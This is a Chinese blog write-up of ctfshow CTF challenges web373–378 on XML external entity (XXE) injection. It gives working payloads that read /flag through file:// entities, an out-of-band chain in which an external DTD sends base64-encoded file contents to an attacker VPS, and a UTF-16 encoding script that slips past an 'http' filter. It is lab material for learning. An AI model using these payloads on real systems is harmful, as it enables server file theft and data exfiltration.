ctfshow XXE web373-web378 wp

最新推荐文章于 2024-08-01 20:34:53 发布
最新推荐文章于 2024-08-01 20:34:53 发布
阅读量1.7k 收藏 4
点赞数 1
分类专栏: ctf 笔记 ctfshow 文章标签: 信息安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42880719/article/details/122777442
版权
ctf 同时被 3 个专栏收录
87 篇文章 66 订阅
订阅专栏
笔记
24 篇文章 8 订阅
订阅专栏
ctfshow
23 篇文章 14 订阅
订阅专栏
本文详细介绍了XXE(XML External Entity Injection)漏洞,包括其概念、利用方式及防御措施。通过实例展示了如何利用XXE获取服务器上的flag,并探讨了在无回显情况下的解决策略,如使用自定义DTD文件反弹shell。同时,文章还提到了在遇到HTTP过滤时的编码绕过技巧。
摘要由CSDN通过智能技术生成

文章目录

web373

XXE(XML External Entity Injection) 全称为 XML 外部实体注入。注入的是XML外部实体

在这里插入图片描述

参考文章:一篇文章带你深入理解漏洞之 XXE 漏洞

libxml_disable_entity_loader(false);:禁止加载外部实体。一个实体由三部分构成: 一个和号 (&), 一个实体名称, 以及一个分号 ( ; )

flag在flag里

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY cmd SYSTEM "file:///flag">
]>
<mumuzi>
<ctfshow>&cmd;</ctfshow>
</mumuzi>

在这里插入图片描述

web374-376

和373的区别是没有echo $ctfshow;,即无回显

因为没有回显,所以只能想办法带到自己vps里。

后面的题把xml头给过滤掉了,这里在vps上创建一个dtd文件,用于反弹shell

#test.dtd
<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://xxx:10086/%file;'> ">
%dtd;
%xxe;

监听10086端口

然后POST发包即可在vps上收到

<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>1</root>

在这里插入图片描述

其实当时这里卡了许久,4台vps,有一台一直都关了安全组(只开放了两常用端口),有一台没php环境,有一台被Streamlit占用,这台就是刚刚才装的php环境。自己给自己整麻了

web377

方法和上面一样,但是过滤http,需要编码绕过。

import requests
url = 'http://b70f356b-ab20-4df6-b661-d7827322fc80.challenge.ctf.show/'
data = '''<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://101.35.244.30/test.dtd">
%aaa;
]>
<root>1</root>'''
r = requests.post(url=url,data=data.encode('utf-16'))

web378

忒标准的 XXE

<!DOCTYPE XXE [
<!ENTITY cmd SYSTEM "file:///flag">
]>
<user><username>&cmd;</username>
</user>
是Mumuzi
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFshow XXE(web373-378)
Kradress的博客
03-18 546
post提交,这里外部引入vps的dtd文件。抓包发现username处存在回显。base64解码拿到flag。直接套八股文,拿到flag。这里需要一个根节点来包含。这里用python脚本。这里可以外部引入一个。
-------已搬运------CTFSHOW---WEB AK赛 -- 包含日志 ---sql注入 ---- xxe ----
Zero_Adam的博客
04-29 773
目录:web0_签到_观己一、自己做:二、学到的&&不足:web1_观宇一、自己做:二、学到的:三、学习WPweb2_观星00000+一、自己做:三、看WPweb0_签到_观己 一、自己做: 吐槽一句,ctfshow 的题就是 考知识点!! ,一点拖泥带水的。赞一个!!! <?php if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ d
CTFshow_Web_XXE——web373~377
Ho1aAs‘s Blog
05-07 2395
文章目录参考文章题解web373web374~376web377完 参考文章 一篇文章带你深入理解漏洞之 XXE 漏洞 未知攻焉知防——XXE漏洞攻防 题解 web373 常规XXE flag的路径是/flag // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDo
CTFSHOW-web373-378
最新发布
qq_52579508的博客
08-01 413
在vps上创建一个test.dtd文件,用于反弹shell,内容如下。要绕过 http 就要进行编码绕过 编码为 utf-16。和上题的代码差别不大 ,但是没有输出了,无回显数据。要使用远程服务器 加载 dtd文件。VPS收到flag的base64。以及可以使用这个payload。上面的payload 不行了。这里他不能带有 http了。查看flag的payload。输入的内容不能带那个。
ctfshow web入门 XXE web373~web378
qq_62989306的博客
09-13 1167
burpsuite发包,不能用hackbar[POST]Payload: &xxe;
ctfshow web入门-XXE
LYJ20010728的博客
09-10 1665
ctfshow web入门-XXEweb373题目描述解题思路web374题目描述解题思路web375题目描述解题思路web376题目描述解题思路web377题目描述解题思路web378题目描述解题思路 web373 题目描述 开X 解题思路 题目给出源码,一个有回显的文件读取漏洞 <?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://inpu
ctfshow web入门 XXE
jie_a的博客
06-03 499
web373 题目是这样的,我看的似懂非懂的 // 允许加载外部实体 libxml_disable_entity_loader(false); // xml文件来源于数据流 $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); // 加载xml实体,参数为替代实体、加载外部子集 $dom->loadXML($xmlfile, LIBXML_NOENT
CTFshow——XXE
D.MIND 的博客
08-23 839
web373 <?php error_reporting(0); libxml_disable_entity_loader(false); $xmlfile = file_get_contents('php://input'); if(isset($xmlfile)){ $dom = new DOMDocument(); $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); $creds = simplexml_i
ctfshow XXE
lwbcsd的博客
04-03 4567
xxe web373 有回显 函数介绍 libxml_disable_entity_loader #禁用/启用加载外部实体的功能 参数为true时为禁用,参数为false为启用 file_get_contents('php://input') #简单理解就是接受POST请求方式传的数据 loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD) #通过解析一个 XML 标签字符串来组成该文档 simplexml_import_dom #把 DOM 节点
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
第四节 XXE漏洞利用 - 任意文件读取-01
09-15
XXE(Xml External Entity)漏洞是一种常见的安全漏洞,特别是在Web应用程序中广泛存在。XXE漏洞是由于XML解析器对外部实体的解析不当所致,攻击者可以通过构建恶意XML文件来实现文件读取、命令执行、甚至服务器控制...
Ctfshow web入门 XXE 模板注入篇 web373-web378 详细题解 全
Jay17的博客
08-07 2293
Ctfshow web入门 XXE 模板注入篇 web373-web378 详细题解 全
ctfshow-XXE(web373-web378)
m0_72125469的博客
03-11 1165
ctfshow web373 web374 web375 web376 web377 web378
DTD(文档类型定义)介绍
qq_40321119的博客
10-18 2458
DTD简介 DTD中文意思是:文档类型定义,主要用来定义合法的文档结构(包括XML和HTML);可以声明在文档中,也可以作为外部的引用。 内部DTD声明 <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> ...
ctfshow-XXE(web373-web378)_ctfshow373
2401_84971538的博客
05-12 613
能编码简单理解就是(我的理解)input获取到数据后 先绕过正则 然后在操作xml的时候这个对象就能识别出是xml 因为xml支持utf-16 这时哪怕在xml声明编码方式为utf-8这也无所谓 这声明的只是xml内容为utf-8 但是整体过来是utf-16 这个对象是能识别出来的 然后看到这个声明为utf-8后再将内容设为utf-8的编码方式。使用一个不同的方式吧(原理都是一个意思) 为什么要绕一圈呢,就是因为在请求的时候 默认不允许将本地文件发送到dtd文件 间接的影响了我们的请求 所以要套一层。
xxe漏洞——无回显(ctfshow web374——378
m0_73756016的博客
06-04 507
题目过滤的字符串,两个之间只有一个空格,我多打一个就变成了两个,不影响功能同时也绕过了过滤。导致了这题可以注入实体但是没有回显,所以我们考虑数据外带。访问一个请求,把数据加到请求上。但是我看我上题的payload也没有<\?xml version="1.0">在自己的vps上的test.dtd文件脚本。请求访问攻击者服务器的1337端口。和那个xxe lab撞js了;最后的引用来引用去的代码就相当于。比上题少了几行代码,分别是。空格绕过,我多打一个空格在。和上面那题比多过滤了大小写。查看我们flag的值。
CTFshow XXE
starttv的博客
11-10 544
为区分嵌套实体和实体之间的关系,可以通过单双引号来间隔开,引号中嵌套一个参数实体,其%号需要写成:%也可写为16进制的%(1)使用 % 实体名(这里面空格不能少) 在 DTD 中定义,并且只能在 DTD 中使用 %实体名;用bp抓包,可以发现传的内容是xml,并且在username处有回显,直接xxe。引用的实体,他在DTD 中定义,在 XML 文档中引用。(2)只有在 DTD 文件中,参数实体的声明才能引用其他实体。发现了过滤,用空格绕过一下就可以了,步骤和上题一样。过滤了大小写,还是用空格绕过。
ctfshow xxe
m0_74940843的博客
11-16 201
XXE全称为XML External Entity Injection即XMl外部实体注入漏洞1.XXE简介 XXE就是XML外部实体注入,当允许引用外部实体时, XML数据在传输中有可能会被不法分子被修改,如果服务器执行被恶意插入的代码,就可以实现攻击的目的攻击者可以通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。 那有的小伙伴可能就会问了,那XML又是什么呢?2.XML概念 XML是可扩展的标记语言(eXtensible Markup Language),设
ctfshow web 入门xxe
08-23
- *1* [ctfshow web入门 XXE web373~web378](https://blog.csdn.net/qq_62989306/article/details/126839849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值